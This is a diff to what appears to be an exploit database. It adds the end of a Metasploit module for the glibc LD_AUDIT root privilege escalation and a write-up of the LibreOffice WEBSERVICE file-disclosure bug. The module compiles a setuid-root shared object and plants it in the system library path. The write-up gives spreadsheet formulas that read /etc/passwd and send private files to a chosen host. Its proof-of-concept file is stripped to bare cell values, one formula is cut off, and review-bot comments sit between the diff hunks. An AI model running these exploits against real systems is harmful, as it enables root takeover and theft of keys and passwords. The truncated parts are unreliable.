'' + vprint_error 'Could not determine the GNU C library version' + return CheckCode::Safe + elsif glibc_version >= Gem::Version.new('2.12.2') || + (glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12')) + vprint_error "GNU C Library version #{glibc_version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "GNU C Library version #{glibc_version} is vulnerable" + + lib = 'libpcprofile.so' + @lib_dir = nil + vprint_status "Checking for #{lib} in system search paths" + search_paths = cmd_exec "env -i LD_PRELOAD=#{rand_text_alpha rand(10..15)} LD_DEBUG=libs env 2>&1 | grep 'search path='" + search_paths.split('path=')[1..-1].join.split(':').each do |path| + lib_dir = path.to_s.strip + next if lib_dir.eql? '' + libs = cmd_exec "ls '#{lib_dir}'" + if libs.include? lib + @lib_dir = lib_dir + break + end + end + if @lib_dir.nil? + vprint_error "Could not find #{lib}" + return CheckCode::Safe + end + vprint_good "Found #{lib} in #{@lib_dir}" + + unless setuid? suid_exe_path + vprint_error "#{suid_exe_path} is not setuid" + return CheckCode::Detected + end + vprint_good "#{suid_exe_path} is setuid" + + CheckCode::Appears + end + + def upload_and_chmodx(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + cmd_exec "chmod +x '#{path}'" + register_file_for_cleanup path + end + + def on_new_session(client) + # remove root owned shared object from system load path + if client.type.eql? 'meterpreter' + client.core.use 'stdapi' unless client.ext.aliases.include? 
'stdapi' + client.fs.file.rm @so_path + else + client.shell_command_token "rm #{@so_path}" + end + end + + def exploit + check_status = check + + if check_status == CheckCode::Appears + print_good 'The target appears to be vulnerable' + elsif check_status == CheckCode::Detected + fail_with Failure::BadConfig, "#{suid_exe_path} is not suid" + else + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + payload_name = ".#{rand_text_alphanumeric rand(5..10)}" + payload_path = "#{base_dir}/#{payload_name}" + + # Set target + uname = cmd_exec 'uname -m' + vprint_status "System architecture is #{uname}" + if target.name.eql? 'Automatic' + case uname + when 'x86_64' + my_target = targets[2] + when /x86/, /i\d86/ + my_target = targets[1] + else + fail_with Failure::NoTarget, 'Unable to automatically select a target' + end + else + my_target = target + end + print_status "Using target: #{my_target.name}" + + cpu = nil + case my_target['Arch'] + when ARCH_X86 + cpu = Metasm::Ia32.new + when ARCH_X64 + cpu = Metasm::X86_64.new + else + fail_with Failure::NoTarget, 'Target is not compatible' + end + + # Compile shared object + so_stub = %| + extern int setuid(int); + extern int setgid(int); + extern int system(const char *__s); + + void init(void) __attribute__((constructor)); + + void __attribute__((constructor)) init() { + setuid(0); + setgid(0); + system("#{payload_path}"); + } + | + + begin + so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib) + rescue + print_error "Metasm encoding failed: #{$ERROR_INFO}" + elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}" + elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}" + fail_with Failure::Unknown, 'Metasm encoding failed' + end + + # Upload shared object + so_name = ".#{rand_text_alphanumeric rand(5..10)}" + so_path = "#{base_dir}/#{so_name}" + upload_and_chmodx so_path, so + + # Upload exploit + @so_path = "#{@lib_dir}/#{so_name}.so" + exp = %( + umask 0 + LD_AUDIT="libpcprofile.so" 
PCPROFILE_OUTPUT="#{@so_path}" #{suid_exe_path} 2>/dev/null + umask 0022 + cat #{so_path} > #{@so_path} + LD_AUDIT="#{so_name}.so" #{suid_exe_path} + echo > #{@so_path} + ) + exp_name = ".#{rand_text_alphanumeric rand(5..10)}" + exp_path = "#{base_dir}/#{exp_name}" + upload_and_chmodx exp_path, exp + + # Upload payload + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status 'Launching exploit...' + # The echo at the end of the command is required + # else the original session may die + output = cmd_exec "#{exp_path}& echo " + output.each_line { |line| vprint_status line.chomp } + end +end \ No newline at end of file diff --git a/exploits/linux/remote/44022.md b/exploits/linux/remote/44022.md new file mode 100644 index 000000000..8e81957f0 --- /dev/null +++ b/exploits/linux/remote/44022.md 
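Review bot: On a failed run the module leaves a root-owned, world-writable file in the trusted library directory: the uploaded script creates `@so_path` under `umask 0` through libpcprofile and only truncates it with `echo > #{@so_path}` at the end, while the real removal happens in `on_new_session`, which runs only if the payload connects back; the path is not (and cannot be) registered with FileDropper, since the unprivileged session cannot unlink inside `@lib_dir`. Because that residue is writable by any local user and sits in the loader's search path, the operator should be told, e.g. `print_warning "#{@so_path} is root-owned and world-writable; if no session is obtained it must be removed manually"` after `Launching exploit...`. The search-path parse in `check` (`split('path=')` then `split(':')`) also appears to keep ld.so's trailing annotation such as `(system search path)` on the last entry, so the final directory would be mis-listed by `ls`; this is inferred from typical `LD_DEBUG=libs` output and worth verifying.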
@@ -0,0 +1,396 @@
+# Vulnerability description
+
+
+[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)
+
+## First part
+
+LibreOffice supports COM.MICROSOFT.WEBSERVICE function:
+
+ https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4
+
+The function is required to obtain data by URL, usually used as:
+
+ =FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")
+
+In original:
+
+ For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.
+
+In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.
+
+## Second part
+
+By default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.
+
+# Exploitation
+
+To read file you need just:
+
+ =WEBSERVICE("/etc/passwd")
+
+This function can also be used to send a file:
+
+ =WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))
+
+For successful operation, you need to send the files of the current user, so you need to retrieve current user home path.
+
+ =MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",
+
+Also you can parse other files too, like a ~/.ssh/config or something like that.
+
+For other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).
+
+# Impact
+
+It is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.
+ +# Acknowledgment + +Vulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes). + + - - - + +# poc.fods + +``` + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Proof-of-concept: send private keys (this cells of course must be moved and set color to white) + + + + + + + + + + Current user: + + + #VALUE! + + + 689 + + + 676 + + + #VALUE! + + + (change this)Address: + + + http://localhost:8080 + + + + + + List of private keys: + + + + + #VALUE! + + + + Send: + + + + + + + 0 (default path) + + + + + + + #VALUE! + + + + + + 1 + + + + + + 132 + + + 109 + + + 96 + + + + #VALUE! + + + + + + 2 + + + + + + 297 + + + 259 + + + 246 + + + + #VALUE! + + + + + + 3 + + + + + + 436 + + + 409 + + + 396 + + + + #VALUE! + + + + + + 4 + + + + + + 586 + + + 563 + + + 550 + + + + #VALUE! + + + + + + 5 + + + + + + 718 + + + 695 + + + 682 + + + + #VALUE! + + + + + + 6 + + + + + + 882 + + + 860 + + + 847 + + + + #VALUE! + + + + + + 7 + + + + + + 1267 + + + 1240 + + + 1227 + + + + #VALUE! + + + + + + 8 + + + + + + 1408 + + + 1383 + + + 1370 + + + + #VALUE! + + + + + + 9 + + + + + + #VALUE! + + + #VALUE! + + + #VALUE! + + + + #VALUE! + + + + + + + +``` \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ab2480fdb..4bc031f83 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
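Review bot: The `poc.fods` fence at the end of the file holds only bare cell values — every XML element was stripped on import — so the document the text describes cannot be reconstructed from it, and the `=MID(WEBSERVICE("/proc/self/environ") …` line in the Exploitation section is cut off mid-expression. Both gaps should be stated in the file rather than left silently incomplete, e.g. a line `<!-- poc.fods: XML markup was lost in import; only cell text survives -->` directly above the fence. The Impact section also says the issue affects LibreOffice prior to 5.4.5/6.0.1 on all operating systems, which disagrees with the index row that files this entry under platform `linux` with the title `< 6.0.1`; the header should state the fixed versions (5.4.5 and 6.0.1) once so a reader can check an installation against them.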
@@ -9321,6 +9321,9 @@ id,file,description,date,author,type,platform,port
 43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
 43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
 44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,
+44023,exploits/linux/local/44023.rb,"Juju-run Agent - Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
+44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
+44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -16009,6 +16012,7 @@ id,file,description,date,author,type,platform,port
 44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
 44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
 44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple,
+44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@@ -38025,6 +38029,9 @@ id,file,description,date,author,type,platform,port
 44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php,
 44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php,
 44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php,
+44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java,
+44020,exploits/java/webapps/44020.txt,"LogicalDOC Enterprise 7.7.4 - User Enumeration",2018-02-12,LiquidWorm,webapps,java,
+44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80